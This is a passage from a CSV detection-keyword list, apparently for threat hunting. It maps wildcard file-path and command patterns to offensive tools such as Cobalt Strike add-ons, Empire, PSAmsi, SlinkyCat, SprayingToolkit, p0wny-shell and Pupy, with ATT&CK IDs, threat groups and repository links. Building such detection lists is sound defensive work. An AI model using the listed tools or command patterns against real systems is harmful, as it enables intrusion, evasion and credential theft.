Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*Outflank-Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*OutlookEmailAbuse.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Out-Minidump.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Out-ObfuscatedAst.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Out-ObfuscatedStringCommand.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Out-ObfuscatedTokenCommand.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*output*kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Output.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*output/AccountsWithSPN.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AdminAccessComputers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainControllers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainGroups.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainHosts.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainUserAccounts.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainUsers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k12.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k16.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k19.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k22.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k8.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllTrusts.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/CompletedDescriptionField.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DescriptionContainsPass.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DNETAccountsByDescription.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DomainAdmins.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DomainGroupsLocalAdmin.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DomainUserAccountsWithCompletedADDescription.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/ExchangeServers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/html/data/beacons.json*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*output/NeverLoggedInAccounts.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/NonDCWindows10Computers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/NonDCWindows11Computers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/NonDCWindows7Computers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/PasswordNeverExpire.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*output/RatChatPT_unix*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*output/RDPMachines.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersInDomainAdminsGroup.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersLastPasswordChange.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersNoPasswordRequired.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersPasswordMustChange.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersPasswordNotChanged.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/WinRMMachines.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*Out-RundllCommand*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*OverrideLHOST 360.com*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*owa */autodiscover/autodiscover.xml* --recon*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*OWASP*Amass*","offensive_tool_keyword","amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","N/A","Information Gathering","https://github.com/caffix/amass","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*OwnerPersist-POST.*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Ox-Bruter.pl*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*-p 5000:5000 pador_vuln_server*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*P0cL4bs*","offensive_tool_keyword","Github Username","github repo name hosting lots of exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/P0cL4bs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*p0dalirius/Coercer*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*p0dalirius/Coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*p0dalirius/ExtractBitlockerKeys*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*p0dalirius/LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*p0dalirius/pyLAPS*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"*p0f -i eth* -p*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*p0f/p0f.fp*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*p0wnedShell*","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","10","1488","363","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z" +"*p0wny-shell*","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","10","1579","620","2023-08-10T15:54:47Z","2016-11-09T20:41:01Z" +"*p3nt4/Nuages*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*P4wnP1*","offensive_tool_keyword","P4wnP1","P4wnP1 is a highly customizable USB attack platform. based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).","T1200 - T1056.001 - T1059.003 - T1547.001","TA0002 - TA0003 - TA0004","N/A","N/A","Network Exploitation tools","https://github.com/RoganDawes/P4wnP1","1","1","N/A","N/A","10","3768","667","2019-10-31T12:30:16Z","2017-02-22T14:34:09Z" +"*P8CuaPrgwBjunvZxJcgq*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*pack_py_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*package externc2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations 